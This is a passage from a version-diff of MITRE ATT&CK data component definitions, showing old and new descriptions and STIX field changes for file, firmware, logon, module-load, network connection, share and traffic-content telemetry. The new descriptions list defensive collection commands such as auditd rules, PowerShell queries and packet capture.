| | | ts signature or detect packing/obfuscation. - File Attribute |
| | | s: Analyzing attributes like hidden, system, or read-only fl |
| | | ags in Windows. - File Hashes: Generating MD5, SHA-1, or SHA |
| | | -256 hashes of files to compare against threat intelligence |
| | | feeds. - File Location: Monitoring files located in unusual |
| | | directories or paths, such as temporary or user folders. Th |
| | | is data component can be collected through the following mea |
| | | sures: Windows - Sysinternals Tools: Use `AccessEnum` or ` |
| | | PSFile` to retrieve metadata about file access and permissio |
| | | ns. - Windows Event Logs: Enable object access auditing and |
| | | monitor events like 4663 (Object Access) and 5140 (A network |
| | | share object was accessed). - PowerShell: Use Get-Item or G |
| | | et-ChildItem cmdlets: `Get-ChildItem -Path "C:\Path\To\Direc |
| | | tory" -Recurse | Select-Object Name, Length, LastWriteTime, |
| | | Attributes` Linux - File System Commands: Use `ls -l` or s |
| | | tat to retrieve file metadata: `stat /path/to/file` - Auditd |
| | | : Configure audit rules to log metadata access: `auditctl -w |
| | | /path/to/file -p wa -k file_metadata` - Filesystem Integrit |
| | | y Tools: Tools like tripwire or AIDE (Advanced Intrusion Det |
| | | ection Environment) can monitor file metadata changes. macO |
| | | S - FSEvents: Use FSEvents to track file metadata changes. |
| | | - Endpoint Security Framework (ESF): Capture metadata-relate |
| | | d events via ESF APIs. - Command-Line Tools: Use ls -l or xa |
| | | ttr for file attributes: `ls -l@ /path/to/file` SIEM Integr |
| | | ation - Forward file metadata logs from endpoint or network |
| | | devices to a SIEM for centralized analysis. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-11-01T21:18:51.941Z | 2025-04-18T15:10:14.725Z |
| description | Contextual data about a file, which may include information such as name, the content (ex: signature, headers, or data/media), user/owner, permissions, etc. | contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples:
- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\Windows\System32\config\SAM on Windows.
- Timestamps: Analyzing the creation, modification, and access timestamps of a file.
- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.
- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.
- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.
- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.
This data component can be collected through the following measures:
Windows
- Sysinternals Tools: Use `AccessEnum` or `PSFile` to retrieve metadata about file access and permissions.
- Windows Event Logs: Enable object access auditing and monitor events like 4663 (Object Access) and 5140 (A network share object was accessed).
- PowerShell: Use Get-Item or Get-ChildItem cmdlets: `Get-ChildItem -Path "C:\Path\To\Directory" -Recurse | Select-Object Name, Length, LastWriteTime, Attributes`
Linux
- File System Commands: Use `ls -l` or stat to retrieve file metadata: `stat /path/to/file`
- Auditd: Configure audit rules to log metadata access: `auditctl -w /path/to/file -p wa -k file_metadata`
- Filesystem Integrity Tools: Tools like tripwire or AIDE (Advanced Intrusion Detection Environment) can monitor file metadata changes.
macOS
- FSEvents: Use FSEvents to track file metadata changes.
- Endpoint Security Framework (ESF): Capture metadata-related events via ESF APIs.
- Command-Line Tools: Use ls -l or xattr for file attributes: `ls -l@ /path/to/file`
SIEM Integration
- Forward file metadata logs from endpoint or network devices to a SIEM for centralized analysis. |
| x_mitre_version | 1.0 | 1.1 |
File: File Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to a file, or its access permissions and attrib | t | Changes made to a file, including updates to its contents, m |
| utes, typically to alter the contents of the targeted file ( | | etadata, access permissions, or attributes. These modificati |
| ex: Windows EID 4670 or Sysmon EID 2) | | ons may indicate legitimate activity (e.g., software updates |
| | | ) or unauthorized changes (e.g., tampering, ransomware, or a |
| | | dversarial modifications). Examples: - Content Modificatio |
| | | ns: Changes to the content of a configuration file, such as |
| | | modifying `/etc/ssh/sshd_config` on Linux or `C:\Windows\Sys |
| | | tem32\drivers\etc\hosts` on Windows. - Permission Changes: A |
| | | ltering file permissions to allow broader access, such as ch |
| | | anging a file from `644` to `777` on Linux or modifying NTFS |
| | | permissions on Windows. - Attribute Modifications: Changing |
| | | a file's attributes to hidden, read-only, or system on Wind |
| | | ows. - Timestamp Manipulation: Adjusting a file's creation o |
| | | r modification timestamp using tools like `touch` in Linux o |
| | | r timestomping tools on Windows. - Software or System File C |
| | | hanges: Modifying system files such as `boot.ini`, kernel mo |
| | | dules, or application binaries. This data component can be |
| | | collected through the following measures: Windows - Event |
| | | Logs: Enable file system auditing to monitor file modificati |
| | | ons using Security Event ID 4670 (File System Audit) or Sysm |
| | | on Event ID 2 (File creation time changed). - PowerShell: Us |
| | | e Get-ItemProperty or Get-Acl cmdlets to monitor file proper |
| | | ties: `Get-Item -Path "C:\path\to\file" | Select-Object Name |
| | | , Attributes, LastWriteTime` Linux - File System Monitorin |
| | | g: Use tools like auditd with rules to monitor file modifica |
| | | tions: `auditctl -w /path/to/file -p wa -k file_modification |
| | | ` - Inotify: Use inotifywait to watch for real-time changes |
| | | to files or directories: `inotifywait -m /path/to/file` mac |
| | | OS - Endpoint Security Framework (ESF): Monitor file modifi |
| | | cation events using ESF APIs. - Audit Framework: Configure a |
| | | udit rules to track file changes. - Command-Line Tools: Use |
| | | fs_usage to monitor file activities: `fs_usage -w /path/to/f |
| | | ile` SIEM Tools - Collect logs from endpoint agents (e.g., |
| | | Sysmon, Auditd) and file servers to centralize file modific |
| | | ation event data. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.273Z | 2025-04-18T15:10:11.410Z |
| description | Changes made to a file, or its access permissions and attributes, typically to alter the contents of the targeted file (ex: Windows EID 4670 or Sysmon EID 2) | Changes made to a file, including updates to its contents, metadata, access permissions, or attributes. These modifications may indicate legitimate activity (e.g., software updates) or unauthorized changes (e.g., tampering, ransomware, or adversarial modifications). Examples:
- Content Modifications: Changes to the content of a configuration file, such as modifying `/etc/ssh/sshd_config` on Linux or `C:\Windows\System32\drivers\etc\hosts` on Windows.
- Permission Changes: Altering file permissions to allow broader access, such as changing a file from `644` to `777` on Linux or modifying NTFS permissions on Windows.
- Attribute Modifications: Changing a file's attributes to hidden, read-only, or system on Windows.
- Timestamp Manipulation: Adjusting a file's creation or modification timestamp using tools like `touch` in Linux or timestomping tools on Windows.
- Software or System File Changes: Modifying system files such as `boot.ini`, kernel modules, or application binaries.
This data component can be collected through the following measures:
Windows
- Event Logs: Enable file system auditing to monitor file modifications using Security Event ID 4670 (File System Audit) or Sysmon Event ID 2 (File creation time changed).
- PowerShell: Use Get-ItemProperty or Get-Acl cmdlets to monitor file properties: `Get-Item -Path "C:\path\to\file" | Select-Object Name, Attributes, LastWriteTime`
Linux
- File System Monitoring: Use tools like auditd with rules to monitor file modifications: `auditctl -w /path/to/file -p wa -k file_modification`
- Inotify: Use inotifywait to watch for real-time changes to files or directories: `inotifywait -m /path/to/file`
macOS
- Endpoint Security Framework (ESF): Monitor file modification events using ESF APIs.
- Audit Framework: Configure audit rules to track file changes.
- Command-Line Tools: Use fs_usage to monitor file activities: `fs_usage -w /path/to/file`
SIEM Tools
- Collect logs from endpoint agents (e.g., Sysmon, Auditd) and file servers to centralize file modification event data. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Firmware: Firmware Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Changes made to firmware, including its settings and/or data | t | Changes made to firmware, which may include its settings, co |
| , such as MBR (Master Boot Record) and VBR (Volume Boot Reco | | nfigurations, or underlying data. This can encompass alterat |
| rd) | | ions to the Master Boot Record (MBR), Volume Boot Record (VB |
| | | R), or other firmware components critical to system boot and |
| | | functionality. Such modifications are often indicators of a |
| | | dversary activity, including malware persistence and system |
| | | compromise. Examples: - Changes to Master Boot Record (MBR |
| | | ): Modifying the MBR to load malicious code during the boot |
| | | process. - Changes to Volume Boot Record (VBR): Altering the |
| | | VBR to redirect boot processes to malicious locations. - Fi |
| | | rmware Configuration Changes: Modifying BIOS/UEFI settings s |
| | | uch as disabling Secure Boot. - Firmware Image Tampering: Up |
| | | dating firmware with a malicious or unauthorized image. - Lo |
| | | gs or Errors Indicating Firmware Changes: Logs showing unaut |
| | | horized firmware updates or checksum mismatches. This data |
| | | component can be collected through the following measures: |
| | | - BIOS/UEFI Logs: Enable and monitor BIOS/UEFI logs to captu |
| | | re settings changes or firmware updates. - Firmware Integrit |
| | | y Monitoring: Use tools or firmware security features to det |
| | | ect changes to firmware components. - Endpoint Detection and |
| | | Response (EDR) Solutions: Many EDR platforms can detect abn |
| | | ormal firmware activity, such as changes to MBR/VBR or unaut |
| | | horized firmware updates. - File System Monitoring: Monitor |
| | | changes to MBR/VBR-related files using tools like Sysmon or |
| | | auditd. - Windows Example (Sysmon): Monitor Event ID 7 ( |
| | | Raw disk access). - Linux Example (auditd): `auditctl -w |
| | | /dev/sda -p wa -k firmware_modification` - Network Traffic |
| | | Analysis: Capture firmware updates downloaded over the netwo |
| | | rk, particularly from untrusted sources. Use network monitor |
| | | ing tools like Zeek or Wireshark to analyze firmware-related |
| | | traffic. - Secure Boot Logs: Collect and analyze Secure Boo |
| | | t logs for signs of tampering or unauthorized configurations |
| | | . Example: Use PowerShell to retrieve Secure Boot settings o |
| | | n Windows: `Confirm-SecureBootUEFI` - Vendor-Specific Firmwa |
| | | re Tools: Many hardware vendors provide tools for firmware i |
| | | ntegrity checks.Examples: - Intel Platform Firmware Resi |
| | | lience (PFR). - Lenovo UEFI diagnostics. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.271Z | 2025-04-18T15:12:52.606Z |
| description | Changes made to firmware, including its settings and/or data, such as MBR (Master Boot Record) and VBR (Volume Boot Record) | Changes made to firmware, which may include its settings, configurations, or underlying data. This can encompass alterations to the Master Boot Record (MBR), Volume Boot Record (VBR), or other firmware components critical to system boot and functionality. Such modifications are often indicators of adversary activity, including malware persistence and system compromise. Examples:
- Changes to Master Boot Record (MBR): Modifying the MBR to load malicious code during the boot process.
- Changes to Volume Boot Record (VBR): Altering the VBR to redirect boot processes to malicious locations.
- Firmware Configuration Changes: Modifying BIOS/UEFI settings such as disabling Secure Boot.
- Firmware Image Tampering: Updating firmware with a malicious or unauthorized image.
- Logs or Errors Indicating Firmware Changes: Logs showing unauthorized firmware updates or checksum mismatches.
This data component can be collected through the following measures:
- BIOS/UEFI Logs: Enable and monitor BIOS/UEFI logs to capture settings changes or firmware updates.
- Firmware Integrity Monitoring: Use tools or firmware security features to detect changes to firmware components.
- Endpoint Detection and Response (EDR) Solutions: Many EDR platforms can detect abnormal firmware activity, such as changes to MBR/VBR or unauthorized firmware updates.
- File System Monitoring: Monitor changes to MBR/VBR-related files using tools like Sysmon or auditd.
- Windows Example (Sysmon): Monitor Event ID 7 (Raw disk access).
- Linux Example (auditd): `auditctl -w /dev/sda -p wa -k firmware_modification`
- Network Traffic Analysis: Capture firmware updates downloaded over the network, particularly from untrusted sources. Use network monitoring tools like Zeek or Wireshark to analyze firmware-related traffic.
- Secure Boot Logs: Collect and analyze Secure Boot logs for signs of tampering or unauthorized configurations. Example: Use PowerShell to retrieve Secure Boot settings on Windows: `Confirm-SecureBootUEFI`
- Vendor-Specific Firmware Tools: Many hardware vendors provide tools for firmware integrity checks.Examples:
- Intel Platform Firmware Resilience (PFR).
- Lenovo UEFI diagnostics. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Logon Session: Logon Session Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Initial construction of a successful new user logon followin | t | The successful establishment of a new user session following |
| g an authentication attempt. (e.g. Windows EID 4624, /var/lo | | a successful authentication attempt. This typically signifi |
| g/utmp, or /var/log/wmtp) | | es that a user has provided valid credentials or authenticat |
| | | ion tokens, and the system has initiated a session associate |
| | | d with that user account. This data is crucial for tracking |
| | | authentication events and identifying potential unauthorized |
| | | access. Examples: - Windows Systems - Event ID: 4624 |
| | | - Logon Type: 2 (Interactive) or 10 (Remote Interact |
| | | ive via RDP). - Account Name: JohnDoe - Sour |
| | | ce Network Address: 192.168.1.100 - Authentication P |
| | | ackage: NTLM - Linux Systems - /var/log/utmp or /var/log |
| | | /wtmp: - Log format: login user [tty] from [source_i |
| | | p] - User: jane - IP: 10.0.0.5 - Tim |
| | | estamp: 2024-12-28 08:30:00 - macOS Systems - /var/log/a |
| | | sl.log or unified logging framework: - Log: com.appl |
| | | e.securityd: Authentication succeeded for user 'admin' - Clo |
| | | ud Environments - Azure Sign-In Logs: - Activity |
| | | : Sign-in successful - Client App: Browser - |
| | | Location: Unknown (Country: X) - Google Workspace - Act |
| | | ivity: Login - Event Type: successful_login |
| | | - Source IP: 203.0.113.55 This data component can be collec |
| | | ted through the following measures: - Windows Systems - |
| | | Event Logs: Monitor Security Event Logs using Event ID 4624 |
| | | for successful logons. - PowerShell Example: `Get-Event |
| | | Log -LogName Security -InstanceId 4624` - Linux Systems |
| | | - Log Files: Monitor `/var/log/utmp`, `/var/log/wtmp`, or `/ |
| | | var/log/auth.log` for logon events. - Tools: Use `last` |
| | | or `who` commands to parse login records. - macOS Systems |
| | | - Log Sources: Monitor `/var/log/asl.log` or Apple Unified |
| | | Logs using the `log show` command. - Command Example: ` |
| | | log show --predicate 'eventMessage contains "Authentication |
| | | succeeded"' --info` - Cloud Environments - Azure AD: Use |
| | | Azure Monitor to analyze sign-in logs. Example CLI Query: ` |
| | | az monitor log-analytics query -w <workspace_id> --analytics |
| | | -query "AzureActivity | where ActivityStatus == 'Success' an |
| | | d OperationName == 'Sign-in'"` - Google Workspace: Enabl |
| | | e and monitor Login Audit logs from the Admin Console. - |
| | | Office 365: Use Audit Log Search in Microsoft 365 Security |
| | | & Compliance Center for login-related events. - Network Logs |
| | | - Sources: Network authentication mechanisms (e.g., RAD |
| | | IUS or TACACS logs). - Enable EDR Monitoring: - EDR too |
| | | ls monitor logon session activity, including the creation of |
| | | new sessions. - Configure alerts for: Suspicious logon |
| | | types (e.g., Logon Type 10 for RDP or Type 5 for Service). L |
| | | ogons from unusual locations, accounts, or devices. - Le |
| | | verage EDR telemetry for session attributes like source IP, |
| | | session duration, and originating process. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-07T16:18:20.802Z | 2025-04-18T15:12:26.544Z |
| description | Initial construction of a successful new user logon following an authentication attempt. (e.g. Windows EID 4624, /var/log/utmp, or /var/log/wmtp) | The successful establishment of a new user session following a successful authentication attempt. This typically signifies that a user has provided valid credentials or authentication tokens, and the system has initiated a session associated with that user account. This data is crucial for tracking authentication events and identifying potential unauthorized access. Examples:
- Windows Systems
- Event ID: 4624
- Logon Type: 2 (Interactive) or 10 (Remote Interactive via RDP).
- Account Name: JohnDoe
- Source Network Address: 192.168.1.100
- Authentication Package: NTLM
- Linux Systems
- /var/log/utmp or /var/log/wtmp:
- Log format: login user [tty] from [source_ip]
- User: jane
- IP: 10.0.0.5
- Timestamp: 2024-12-28 08:30:00
- macOS Systems
- /var/log/asl.log or unified logging framework:
- Log: com.apple.securityd: Authentication succeeded for user 'admin'
- Cloud Environments
- Azure Sign-In Logs:
- Activity: Sign-in successful
- Client App: Browser
- Location: Unknown (Country: X)
- Google Workspace
- Activity: Login
- Event Type: successful_login
- Source IP: 203.0.113.55
This data component can be collected through the following measures:
- Windows Systems
- Event Logs: Monitor Security Event Logs using Event ID 4624 for successful logons.
- PowerShell Example: `Get-EventLog -LogName Security -InstanceId 4624`
- Linux Systems
- Log Files: Monitor `/var/log/utmp`, `/var/log/wtmp`, or `/var/log/auth.log` for logon events.
- Tools: Use `last` or `who` commands to parse login records.
- macOS Systems
- Log Sources: Monitor `/var/log/asl.log` or Apple Unified Logs using the `log show` command.
- Command Example: `log show --predicate 'eventMessage contains "Authentication succeeded"' --info`
- Cloud Environments
- Azure AD: Use Azure Monitor to analyze sign-in logs. Example CLI Query: `az monitor log-analytics query -w --analytics-query "AzureActivity | where ActivityStatus == 'Success' and OperationName == 'Sign-in'"`
- Google Workspace: Enable and monitor Login Audit logs from the Admin Console.
- Office 365: Use Audit Log Search in Microsoft 365 Security & Compliance Center for login-related events.
- Network Logs
- Sources: Network authentication mechanisms (e.g., RADIUS or TACACS logs).
- Enable EDR Monitoring:
- EDR tools monitor logon session activity, including the creation of new sessions.
- Configure alerts for: Suspicious logon types (e.g., Logon Type 10 for RDP or Type 5 for Service). Logons from unusual locations, accounts, or devices.
- Leverage EDR telemetry for session attributes like source IP, session duration, and originating process. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Module: Module Load
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Attaching a module into the memory of a process/program, typ | t | When a process or program dynamically attaches a shared libr |
| ically to access shared resources/features provided by the m | | ary, module, or plugin into its memory space. This action is |
| odule (ex: Sysmon EID 7) | | typically performed to extend the functionality of an appli |
| | | cation, access shared system resources, or interact with ker |
| | | nel-mode components. *Data Collection Measures:* - Event L |
| | | ogging (Windows): - Sysmon Event ID 7: Logs when a DLL i |
| | | s loaded into a process. - Windows Security Event ID 468 |
| | | 8: Captures process creation events, often useful for correl |
| | | ating module loads. - Windows Defender ATP: Can provide |
| | | visibility into suspicious module loads. - Event Logging (Li |
| | | nux/macOS): - AuditD (`execve` and `open` syscalls): Cap |
| | | tures when shared libraries (`.so` files) are loaded. - |
| | | Ltrace/Strace: Monitors process behavior, including library |
| | | calls (`dlopen`, `execve`). - MacOS Endpoint Security Fr |
| | | amework (ESF): Monitors library loads (`ES_EVENT_TYPE_NOTIFY |
| | | _DYLD_INSERT_LIBRARIES`). - Endpoint Detection & Response (E |
| | | DR): - Provide real-time telemetry on module loads and |
| | | process injections. - Sysinternals Process Monitor (`pro |
| | | cmon`): Captures loaded modules and their execution context. |
| | | - Memory Forensics: - Volatility Framework (`malfind`, |
| | | `ldrmodules`): Detects injected DLLs and anomalous module lo |
| | | ads. - Rekall Framework: Useful for kernel-mode module d |
| | | etection. - SIEM and Log Analysis: - Centralized log agg |
| | | regation to correlate suspicious module loads across the env |
| | | ironment. - Detection rules using correlation searches a |
| | | nd behavioral analytics. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.272Z | 2025-04-18T15:12:16.486Z |
| description | Attaching a module into the memory of a process/program, typically to access shared resources/features provided by the module (ex: Sysmon EID 7) | When a process or program dynamically attaches a shared library, module, or plugin into its memory space. This action is typically performed to extend the functionality of an application, access shared system resources, or interact with kernel-mode components.
*Data Collection Measures:*
- Event Logging (Windows):
- Sysmon Event ID 7: Logs when a DLL is loaded into a process.
- Windows Security Event ID 4688: Captures process creation events, often useful for correlating module loads.
- Windows Defender ATP: Can provide visibility into suspicious module loads.
- Event Logging (Linux/macOS):
- AuditD (`execve` and `open` syscalls): Captures when shared libraries (`.so` files) are loaded.
- Ltrace/Strace: Monitors process behavior, including library calls (`dlopen`, `execve`).
- MacOS Endpoint Security Framework (ESF): Monitors library loads (`ES_EVENT_TYPE_NOTIFY_DYLD_INSERT_LIBRARIES`).
- Endpoint Detection & Response (EDR):
- Provide real-time telemetry on module loads and process injections.
- Sysinternals Process Monitor (`procmon`): Captures loaded modules and their execution context.
- Memory Forensics:
- Volatility Framework (`malfind`, `ldrmodules`): Detects injected DLLs and anomalous module loads.
- Rekall Framework: Useful for kernel-mode module detection.
- SIEM and Log Analysis:
- Centralized log aggregation to correlate suspicious module loads across the environment.
- Detection rules using correlation searches and behavioral analytics. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Connection Creation
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Initial construction of a network connection, such as captur | t | The initial establishment of a network session, where a syst |
| ing socket information with a source/destination IP and port | | em or process initiates a connection to a local or remote en |
| (s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | | dpoint. This typically involves capturing socket information |
| | | (source/destination IP, ports, protocol) and tracking sessi |
| | | on metadata. Monitoring these events helps detect lateral mo |
| | | vement, exfiltration, and command-and-control (C2) activitie |
| | | s. *Data Collection Measures:* - Windows: - Event ID 5 |
| | | 156 – Filtering Platform Connection - Logs network connectio |
| | | ns permitted by Windows Filtering Platform (WFP). - Sysm |
| | | on Event ID 3 – Network Connection Initiated - Captures proc |
| | | ess, source/destination IP, ports, and parent process. - Lin |
| | | ux/macOS: - Netfilter (iptables), nftables logs - Tracks |
| | | incoming and outgoing network connections. - AuditD (`c |
| | | onnect` syscall) - Logs TCP, UDP, and ICMP connections. |
| | | - Zeek (`conn.log`) - Captures protocol, duration, and bytes |
| | | transferred. - Cloud & Network Infrastructure: - AWS VP |
| | | C Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the n |
| | | etwork level in cloud environments. - Zeek (conn.log) or |
| | | Suricata (network events) - Captures packet metadata for de |
| | | tection and correlation. - Endpoint Detection & Response (ED |
| | | R): - Detect anomalous network activity such as new C2 c |
| | | onnections or data exfiltration attempts. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-20T20:18:06.745Z | 2025-04-18T15:11:23.639Z |
| description | Initial construction of a network connection, such as capturing socket information with a source/destination IP and port(s) (ex: Windows EID 5156, Sysmon EID 3, or Zeek conn.log) | The initial establishment of a network session, where a system or process initiates a connection to a local or remote endpoint. This typically involves capturing socket information (source/destination IP, ports, protocol) and tracking session metadata. Monitoring these events helps detect lateral movement, exfiltration, and command-and-control (C2) activities.
*Data Collection Measures:*
- Windows:
- Event ID 5156 – Filtering Platform Connection - Logs network connections permitted by Windows Filtering Platform (WFP).
- Sysmon Event ID 3 – Network Connection Initiated - Captures process, source/destination IP, ports, and parent process.
- Linux/macOS:
- Netfilter (iptables), nftables logs - Tracks incoming and outgoing network connections.
- AuditD (`connect` syscall) - Logs TCP, UDP, and ICMP connections.
- Zeek (`conn.log`) - Captures protocol, duration, and bytes transferred.
- Cloud & Network Infrastructure:
- AWS VPC Flow Logs / Azure NSG Flow Logs - Logs IP traffic at the network level in cloud environments.
- Zeek (conn.log) or Suricata (network events) - Captures packet metadata for detection and correlation.
- Endpoint Detection & Response (EDR):
- Detect anomalous network activity such as new C2 connections or data exfiltration attempts. |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Share: Network Share Access
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Opening a network share, which makes the contents available | t | Opening a network share, which makes the contents available |
| to the requestor (ex: Windows EID 5140 or 5145) | | to the requestor (ex: Windows EID 5140 or 5145) *Data Colle |
| | | ction Measures:* - Windows: - Event ID 5140 – Network S |
| | | hare Object Access Logs every access attempt to a network sh |
| | | are. - Event ID 5145 – Detailed Network Share Object Acc |
| | | ess Captures granular access control information, including |
| | | the requesting user, source IP, and access permissions. |
| | | - Sysmon Event ID 3 – Network Connection Initiated Helps tra |
| | | ck SMB connections to suspicious or unauthorized network sha |
| | | res. - Enable Audit Policy for Network Share Access: `au |
| | | ditpol /set /subcategory:"File Share" /success:enable /failu |
| | | re:enable` - Enable PowerShell Logging to Detect Unautho |
| | | rized SMB Access: `Set-ExecutionPolicy RemoteSigned` - R |
| | | estrict Network Share Access with Group Policy (GPO): `Compu |
| | | ter Configuration → Windows Settings → Security Settings → L |
| | | ocal Policies → User Rights Assignment` Set "Access this com |
| | | puter from the network" to restrict unauthorized accounts. - |
| | | Linux/macOS: - AuditD (`open`, `read`, `write`, `connec |
| | | t` syscalls) Detects access to NFS, CIFS, and SMB network sh |
| | | ares. - Lsof (`lsof | grep nfs` or `lsof | grep smb`) Id |
| | | entifies active network share connections. - Mount (`mou |
| | | nt | grep nfs` or `mount | grep cifs`) Lists currently mount |
| | | ed network shares. - Enable AuditD for SMB/NFS Access: ` |
| | | auditctl -a always,exit -F arch=b64 -S open -F path=/mnt/sha |
| | | re -k network_share_access` - Monitor Active Network Sha |
| | | res Using Netstat: `netstat -an | grep :445` - Endpoint Dete |
| | | ction & Response (EDR): - Detects abnormal network share |
| | | access behavior, such as unusual account usage, large file |
| | | transfers, or encrypted file activity. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.275Z | 2025-04-18T15:10:01.621Z |
| description | Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145) | Opening a network share, which makes the contents available to the requestor (ex: Windows EID 5140 or 5145)
*Data Collection Measures:*
- Windows:
- Event ID 5140 – Network Share Object Access Logs every access attempt to a network share.
- Event ID 5145 – Detailed Network Share Object Access Captures granular access control information, including the requesting user, source IP, and access permissions.
- Sysmon Event ID 3 – Network Connection Initiated Helps track SMB connections to suspicious or unauthorized network shares.
- Enable Audit Policy for Network Share Access: `auditpol /set /subcategory:"File Share" /success:enable /failure:enable`
- Enable PowerShell Logging to Detect Unauthorized SMB Access: `Set-ExecutionPolicy RemoteSigned`
- Restrict Network Share Access with Group Policy (GPO): `Computer Configuration → Windows Settings → Security Settings → Local Policies → User Rights Assignment` Set "Access this computer from the network" to restrict unauthorized accounts.
- Linux/macOS:
- AuditD (`open`, `read`, `write`, `connect` syscalls) Detects access to NFS, CIFS, and SMB network shares.
- Lsof (`lsof | grep nfs` or `lsof | grep smb`) Identifies active network share connections.
- Mount (`mount | grep nfs` or `mount | grep cifs`) Lists currently mounted network shares.
- Enable AuditD for SMB/NFS Access: `auditctl -a always,exit -F arch=b64 -S open -F path=/mnt/share -k network_share_access`
- Monitor Active Network Shares Using Netstat: `netstat -an | grep :445`
- Endpoint Detection & Response (EDR):
- Detects abnormal network share access behavior, such as unusual account usage, large file transfers, or encrypted file activity. |
| x_mitre_version | 1.0 | 1.1 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
Network Traffic: Network Traffic Content
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Logged network traffic data showing both protocol header and | t | The full packet capture (PCAP) or session data that logs bot |
| body values (ex: PCAP) | | h protocol headers and payload content. This allows analysts |
| | | to inspect command and control (C2) traffic, exfiltration, |
| | | and other suspicious activity within network communications. |
| | | Unlike metadata-based logs, full content analysis enables d |
| | | eeper protocol inspection, payload decoding, and forensic in |
| | | vestigations. *Data Collection Measures:* - Network Packet |
| | | Capture (Full Content Logging) - Wireshark / tcpdump / |
| | | tshark - Full packet captures (PCAP files) for manua |
| | | l analysis or IDS correlation. `tcpdump -i eth0 -w capture.p |
| | | cap` - Zeek (formerly Bro) - Extracts protocol h |
| | | eaders and payload details into structured logs. `echo "rede |
| | | f Log::default_store = Log::ASCII;" > local.zeek | zeek -Cr |
| | | capture.pcap local.zeek` - Suricata / Snort (IDS/IPS wit |
| | | h PCAP Logging) - Deep packet inspection (DPI) with |
| | | signature-based and behavioral analysis. `suricata -c /etc/s |
| | | uricata/suricata.yaml -i eth0 -l /var/log/suricata` - Host-B |
| | | ased Collection - Sysmon Event ID 22 – DNS Query Logging |
| | | , Captures DNS requests made by processes, useful for detect |
| | | ing C2 domains. - Sysmon Event ID 3 – Network Connection |
| | | Initiated, Logs process-to-network connection relationships |
| | | . - AuditD (Linux) – syscall=connect, Monitors outbound |
| | | network requests from processes. `auditctl -a always,exit -F |
| | | arch=b64 -S connect -k network_activity` - Cloud & SaaS Tra |
| | | ffic Collection - AWS VPC Flow Logs / Azure NSG Flow Log |
| | | s / Google VPC Flow Logs, Captures metadata about inbound/ou |
| | | tbound network traffic. - Cloud IDS (AWS GuardDuty, Azur |
| | | e Sentinel, Google Chronicle), Detects malicious activity in |
| | | cloud environments by analyzing network traffic patterns. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| revoked | | False |
| x_mitre_deprecated | | False |
| x_mitre_domains | | ['ics-attack', 'mobile-attack', 'enterprise-attack'] |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-20T15:05:19.274Z | 2025-04-18T15:11:16.672Z |
| description | Logged network traffic data showing both protocol header and body values (ex: PCAP) | The full packet capture (PCAP) or session data that logs both protocol headers and payload content. This allows analysts to inspect command and control (C2) traffic, exfiltration, and other suspicious activity within network communications. Unlike metadata-based logs, full content analysis enables deeper protocol inspection, payload decoding, and forensic investigations.
*Data Collection Measures:*
- Network Packet Capture (Full Content Logging)
- Wireshark / tcpdump / tshark
- Full packet captures (PCAP files) for manual analysis or IDS correlation. `tcpdump -i eth0 -w capture.pcap`
- Zeek (formerly Bro)
